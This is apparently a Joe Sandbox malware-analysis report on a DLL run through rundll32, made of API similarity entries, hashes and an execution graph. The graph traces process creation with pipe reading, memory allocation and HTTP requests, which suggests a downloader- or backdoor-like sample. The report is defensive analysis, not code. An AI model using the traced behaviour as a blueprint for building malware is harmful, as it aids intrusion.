                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFD1B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                            • Opcode ID: 29bc101356f84d96952e9b6f46aeae41848f5e669d7c67a18c62fb47cf68ff97
                                                                                                                                            • Instruction ID: 534ee9dd9013db177466b5afa872c7489071b3bf08e507150bf2a31af924fab8
                                                                                                                                            • Opcode Fuzzy Hash: 29bc101356f84d96952e9b6f46aeae41848f5e669d7c67a18c62fb47cf68ff97
                                                                                                                                            • Instruction Fuzzy Hash: 06116D3430468C42FAEB67316A953FD52425F4C7F0F65C728B93657BD6DE28DA499300
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                            • String ID: bad locale name
                                                                                                                                            • API String ID: 2967684691-1405518554
                                                                                                                                            • Opcode ID: 492b9f12d2017c85e3b9038361cbb09bb50bf92a85eee2bc8d229eea44332673
                                                                                                                                            • Instruction ID: 257ebd258958192414c0201136383fc5e51e53a75ac9e0a2a349a042fac65805
                                                                                                                                            • Opcode Fuzzy Hash: 492b9f12d2017c85e3b9038361cbb09bb50bf92a85eee2bc8d229eea44332673
                                                                                                                                            • Instruction Fuzzy Hash: 86919F33705B888AFB92CF64D4903ED77A1EB887C4F048129EE891BA99DF34C659D350
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2138705365-0
                                                                                                                                            • Opcode ID: e6622a1003ff05e1210d2c7c0291edc59dcda77f184723c5f9fea43b66e241c3
                                                                                                                                            • Instruction ID: 212c56f00f68a2ef71f83bc1973b783350eb29f8722c30a54f44c08f54aa4c97
                                                                                                                                            • Opcode Fuzzy Hash: e6622a1003ff05e1210d2c7c0291edc59dcda77f184723c5f9fea43b66e241c3
                                                                                                                                            • Instruction Fuzzy Hash: 8B81CF72614F8885EB528F25E45039D7360F789BE4F409216FB9C03BAAEF78C698C744
                                                                                                                                            APIs
                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFD53
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFD72
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFD9A
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFDAB
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFDBC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Value
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                            • Opcode ID: 5fa853c1108a3c10bac684210e7d34fd4d35b52258afac04cb1d23d354d3a8e4
                                                                                                                                            • Instruction ID: ff9aa437c0595ea1eb9d58ea7ad14249b49a3c0f1692886f92c925acf78205b5
                                                                                                                                            • Opcode Fuzzy Hash: 5fa853c1108a3c10bac684210e7d34fd4d35b52258afac04cb1d23d354d3a8e4
                                                                                                                                            • Instruction Fuzzy Hash: 40118B3030868D42FAEAA3216D513F962474F8C3F0F55C328B9396ABD6DE28CF499300
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                            • String ID: bad locale name
                                                                                                                                            • API String ID: 2775327233-1405518554
                                                                                                                                            • Opcode ID: 5b311788567aa043f92aba488ebe8b2e5c9052ebe229d9d5e94981fd2abaa2a8
                                                                                                                                            • Instruction ID: 9e5a5e08860c88efdfc9631ff2a57989cd1dbfec02a922697c63f09b54788598
                                                                                                                                            • Opcode Fuzzy Hash: 5b311788567aa043f92aba488ebe8b2e5c9052ebe229d9d5e94981fd2abaa2a8
                                                                                                                                            • Instruction Fuzzy Hash: 41516E33312A48DAEB96DF70D4903EC33A4EB58788F448125FF4967A95DE34C61AC358
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                            • String ID: string too long
                                                                                                                                            • API String ID: 3668304517-2556327735
                                                                                                                                            • Opcode ID: a3acfd3d82963a706bc48d948a37a32f85189e9a0e2e76b76b124625f236f818
                                                                                                                                            • Instruction ID: 5fc0c0a601f6c4d82b55d0d521c46b81e316b69cb665f141bfa2e52588e3f1ef
                                                                                                                                            • Opcode Fuzzy Hash: a3acfd3d82963a706bc48d948a37a32f85189e9a0e2e76b76b124625f236f818
                                                                                                                                            • Instruction Fuzzy Hash: 6321D4B271168CC1EE6A56A694493DC2242931EBE1F60C711FB3D0FBD6DE3986C94301
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ef292095189d688244afeea7f6b845bb184af88f8cb6fafd7eee9d63f68d16f4
                                                                                                                                            • Instruction ID: 975f7225a3a63e299421f78f145c918a74a67d24bf9757e7338846c982cfeb7d
                                                                                                                                            • Opcode Fuzzy Hash: ef292095189d688244afeea7f6b845bb184af88f8cb6fafd7eee9d63f68d16f4
                                                                                                                                            • Instruction Fuzzy Hash: D4B1D232616B8886EB96CF69E4403ED77A4F748FD8F149119EE4903BA8DF38C599C340
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$CurrentThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3792313647-0
                                                                                                                                            • Opcode ID: 5bfa75c5eac8daa5e5b124f9845cd5dbd0aa6498d9a00ed29e9f5e9b47d3ee95
                                                                                                                                            • Instruction ID: 75230aab8a6d904f90b672090fcd263d29a486a149c04a4e1d63e4c13d8814a9
                                                                                                                                            • Opcode Fuzzy Hash: 5bfa75c5eac8daa5e5b124f9845cd5dbd0aa6498d9a00ed29e9f5e9b47d3ee95
                                                                                                                                            • Instruction Fuzzy Hash: 93118235B04F4482EB968B25F85439DA2A1FB8CBE4F448625FF6943BE4DF38C6598700
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2793162063-0
                                                                                                                                            • Opcode ID: 291ec1e7ae4a31a4ec110783320109d88dec717fbf20de4c32bb65debcfab247
                                                                                                                                            • Instruction ID: 829d03ffbff77bbca154661313b9d0eb454c077c2207eabb3bfd33caf306102b
                                                                                                                                            • Opcode Fuzzy Hash: 291ec1e7ae4a31a4ec110783320109d88dec717fbf20de4c32bb65debcfab247
                                                                                                                                            • Instruction Fuzzy Hash: C5116131605B4486E776CF61F4993CA63A0F78CB08F40A028DA8D87B55EF7CC2098B00
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                            • String ID: vector too long
                                                                                                                                            • API String ID: 3668304517-2873823879
                                                                                                                                            • Opcode ID: 4bb3616d7ea08d404592599af73fc3ed7cee367de65b429240fbc6d2583e8d6d
                                                                                                                                            • Instruction ID: 21201f496ad6a7353e8fa5487a27329982cc9aebad2248fd340af911cef24260
                                                                                                                                            • Opcode Fuzzy Hash: 4bb3616d7ea08d404592599af73fc3ed7cee367de65b429240fbc6d2583e8d6d
                                                                                                                                            • Instruction Fuzzy Hash: 73B104326056CC45EEE7CA11D5143E97AA0A34E7E4F88DA11FAA9277D5DF7CC7898300
                                                                                                                                            APIs
                                                                                                                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,000000018001D2F1,?,?,?,?,0000000180001063), ref: 00000001800D7BF8
                                                                                                                                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000000018001D2F1,?,?,?,?,0000000180001063), ref: 00000001800D7C39
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                            • String ID: csm
                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                            • Opcode ID: 8575af2157c29f55c7baebbd7653556403f1897381ddad26d7c95b73a62a9a2e
                                                                                                                                            • Instruction ID: fcce759da6952b3a2c3e9be7184885aaee10aadabcae59dccbb82db99caeb89f
                                                                                                                                            • Opcode Fuzzy Hash: 8575af2157c29f55c7baebbd7653556403f1897381ddad26d7c95b73a62a9a2e
                                                                                                                                            • Instruction Fuzzy Hash: 99115B36614B8482EBA28B15E44038D77E4F78CB94F588225EE8D07B65EF3CC655CB00
                                                                                                                                            APIs
                                                                                                                                            • OutputDebugStringA.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7AA
                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7E0
                                                                                                                                            Strings
                                                                                                                                            • IsolationAware function called after IsolationAwareCleanup, xrefs: 000000018001F7A3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DebugErrorLastOutputString
                                                                                                                                            • String ID: IsolationAware function called after IsolationAwareCleanup
                                                                                                                                            • API String ID: 4132100945-2690750368
                                                                                                                                            • Opcode ID: aaf881318e1cbf80df7b3db725b15d009ca645997f292fdca4c234dcf6e98535
                                                                                                                                            • Instruction ID: 713b0fca42d5e28324eac017ae06fe03b4fcbb217fb76e539ab89f48cb609f07
                                                                                                                                            • Opcode Fuzzy Hash: aaf881318e1cbf80df7b3db725b15d009ca645997f292fdca4c234dcf6e98535
                                                                                                                                            • Instruction Fuzzy Hash: 3D01DE70600D0E86FBF7976198883F913D1AB5D7A4F59D011E915C63A0EF38CACD8710

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:10.7%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:4.6%
                                                                                                                                            Total number of Nodes:868
                                                                                                                                            Total number of Limit Nodes:10
4862->4802 4868 2e0406c 4863->4868 4869 2e03f33 4864->4869 4865->4804 4871 2e0be64 3 API calls 4866->4871 4872 2e082b4 NtFreeVirtualMemory 4867->4872 4873 2e0be64 3 API calls 4868->4873 4874 2e082b4 NtFreeVirtualMemory 4869->4874 4875 2e04119 4870->4875 4876 2e03fd4 4871->4876 4872->4809 4877 2e0407e 4873->4877 4874->4810 4878 2e0be64 3 API calls 4875->4878 4879 2e082b4 NtFreeVirtualMemory 4876->4879 4880 2e082b4 NtFreeVirtualMemory 4877->4880 4881 2e0412b 4878->4881 4879->4820 4880->4825 4882 2e082b4 NtFreeVirtualMemory 4881->4882 4882->4811 4884 2e021e4 4883->4884 4885 2e021f6 6 API calls 4884->4885 4931 2e02134 4885->4931 4887 2e02333 CreateProcessW 4888 2e0b388 NtAllocateVirtualMemory 4887->4888 4889 2e02399 4888->4889 4890 2e0b388 NtAllocateVirtualMemory 4889->4890 4898 2e023d6 4890->4898 4891 2e025e8 4892 2e025fa 4891->4892 4895 2e082b4 NtFreeVirtualMemory 4891->4895 4892->4770 4893 2e025a0 TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 4893->4891 4894 2e02401 PeekNamedPipe 4896 2e024b9 PeekNamedPipe 4894->4896 4894->4898 4895->4892 4897 2e02569 GetExitCodeProcess 4896->4897 4896->4898 4897->4898 4899 2e0258f 4897->4899 4898->4891 4898->4893 4898->4894 4898->4896 4898->4897 4900 2e02468 ReadFile 4898->4900 4903 2e02518 ReadFile 4898->4903 4932 2e0c704 NtDelayExecution 4898->4932 4899->4893 4902 2e0be64 3 API calls 4900->4902 4902->4896 4904 2e0be64 3 API calls 4903->4904 4904->4897 4906 2e0299d 4905->4906 4930 2e02b17 4905->4930 4907 2e029ca 4906->4907 4908 2e082b4 NtFreeVirtualMemory 4906->4908 4906->4930 4909 2e029ea 4907->4909 4910 2e082b4 NtFreeVirtualMemory 4907->4910 4908->4907 4911 2e02a0a 4909->4911 4912 2e082b4 NtFreeVirtualMemory 4909->4912 4910->4909 4913 2e02a2a 4911->4913 4914 2e082b4 NtFreeVirtualMemory 4911->4914 4912->4911 4915 2e02a4a 4913->4915 4916 2e082b4 NtFreeVirtualMemory 4913->4916 4914->4913 4917 2e082b4 NtFreeVirtualMemory 4915->4917 4918 2e02a6a 4915->4918 4916->4915 4917->4918 4919 2e02a8a 4918->4919 4920 2e082b4 
NtFreeVirtualMemory 4918->4920 4921 2e02aaa 4919->4921 4922 2e082b4 NtFreeVirtualMemory 4919->4922 4920->4919 4923 2e02aca 4921->4923 4924 2e082b4 NtFreeVirtualMemory 4921->4924 4922->4921 4925 2e02aea 4923->4925 4926 2e082b4 NtFreeVirtualMemory 4923->4926 4924->4923 4927 2e02b0a 4925->4927 4929 2e082b4 NtFreeVirtualMemory 4925->4929 4926->4925 4928 2e082b4 NtFreeVirtualMemory 4927->4928 4928->4930 4929->4927 4930->4821 4931->4887 4932->4898 4623 2e08a58 4624 2e08a79 4623->4624 4626 2e08a72 4623->4626 4625 2e08b63 GetProcAddress GetProcAddressForCaller 4624->4625 4624->4626 4625->4626 4722 2e07528 4723 2e07548 4722->4723 4724 2e0754f 4722->4724 4724->4723 4725 2e06fc0 NtAllocateVirtualMemory 4724->4725 4726 2e076a7 4725->4726 4728 2e0c734 4726->4728 4729 2e0c74a 4728->4729 4730 2e0c74f 4728->4730 4729->4723 4731 2e0b388 NtAllocateVirtualMemory 4730->4731 4731->4729 4752 2e044b8 4755 2e043c4 4752->4755 4756 2e041b4 129 API calls 4755->4756 4757 2e043cd 4756->4757 4758 2e043eb 4757->4758 4760 2e0c704 NtDelayExecution 4757->4760 4760->4757 4645 2e0696b 4670 2e05b7a new[] 4645->4670 4646 2e069a2 GetExitCodeThread 4646->4670 4647 2e069de GetExitCodeThread 4647->4670 4648 2e05ba7 4649 2e0b388 NtAllocateVirtualMemory 4649->4670 4650 2e0c704 NtDelayExecution 4650->4670 4651 2e05484 3 API calls 4651->4670 4652 2e0be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4652->4670 4653 2e06fc0 NtAllocateVirtualMemory 4653->4670 4654 2e06404 wsprintfA 4654->4670 4655 2e06025 wsprintfA 4655->4670 4656 2e05f36 wsprintfA 4656->4670 4657 2e0bfc0 NtAllocateVirtualMemory 4657->4670 4658 2e08424 11 API calls 4658->4670 4659 2e082b4 NtFreeVirtualMemory 4659->4670 4660 2e0b770 NtAllocateVirtualMemory 4660->4670 4661 2e0b388 NtAllocateVirtualMemory 4663 2e06187 WideCharToMultiByte 4661->4663 4662 2e0b388 NtAllocateVirtualMemory 4665 2e06243 WideCharToMultiByte 4662->4665 4666 2e0be64 3 API calls 4663->4666 4664 2e0b388 NtAllocateVirtualMemory 4667 2e062ff WideCharToMultiByte 
4664->4667 4668 2e0be64 3 API calls 4665->4668 4666->4670 4669 2e0be64 3 API calls 4667->4669 4668->4670 4669->4670 4670->4646 4670->4647 4670->4648 4670->4649 4670->4650 4670->4651 4670->4652 4670->4653 4670->4654 4670->4655 4670->4656 4670->4657 4670->4658 4670->4659 4670->4660 4670->4661 4670->4662 4670->4664 4671 2e04e28 14 API calls 4670->4671 4672 2e08bdc GetCursorPos GetTickCount RtlRandom 4670->4672 4673 2e06cfc NtAllocateVirtualMemory 4670->4673 4674 2e05734 73 API calls 4670->4674 4671->4670 4672->4670 4673->4670 4674->4670 4732 2e0922b 4733 2e09086 4732->4733 4734 2e0904b InternetOpenW 4732->4734 4736 2e09248 4733->4736 4737 2e0923d InternetCloseHandle 4733->4737 4734->4733 4735 2e0908b 4734->4735 4738 2e055dc 3 API calls 4735->4738 4739 2e09250 InternetCloseHandle 4736->4739 4740 2e0925b 4736->4740 4737->4736 4741 2e090ca 4738->4741 4739->4740 4741->4733 4742 2e090f4 4741->4742 4743 2e0c860 8 API calls 4741->4743 4744 2e09106 4742->4744 4745 2e082b4 NtFreeVirtualMemory 4742->4745 4743->4742 4746 2e09118 InternetOpenUrlW 4744->4746 4747 2e082b4 NtFreeVirtualMemory 4744->4747 4745->4744 4746->4733 4749 2e09154 4746->4749 4747->4746 4748 2e0915f InternetReadFile 4748->4749 4749->4733 4749->4748 4750 2e0b388 NtAllocateVirtualMemory 4749->4750 4751 2e0b648 3 API calls 4749->4751 4750->4749 4751->4749 4675 2e0b86c 4676 2e0b880 4675->4676 4679 2e0b8c6 4675->4679 4677 2e0b89e VirtualFree 4676->4677 4678 2e082b4 NtFreeVirtualMemory 4677->4678 4678->4679 4627 2e0545d 4628 2e05265 4627->4628 4629 2e053a4 4627->4629 4632 2e05315 4628->4632 4634 2e05292 4628->4634 4630 2e05479 4629->4630 4631 2e082b4 NtFreeVirtualMemory 4629->4631 4631->4630 4633 2e0532e HttpOpenRequestA 4632->4633 4637 2e0539c 4633->4637 4635 2e052c7 HttpOpenRequestA 4634->4635 4635->4637 4637->4629 4638 2e053b3 InternetSetOptionA 4637->4638 4639 2e053d6 4637->4639 4638->4639 4640 2e05424 HttpSendRequestA 4639->4640 4643 2e053e0 4639->4643 4641 2e05443 4640->4641 4641->4629 4642 2e082b4 
NtFreeVirtualMemory 4641->4642 4642->4629 4644 2e053fb HttpSendRequestA 4643->4644 4644->4641

                                                                                                                                            Control-flow Graph

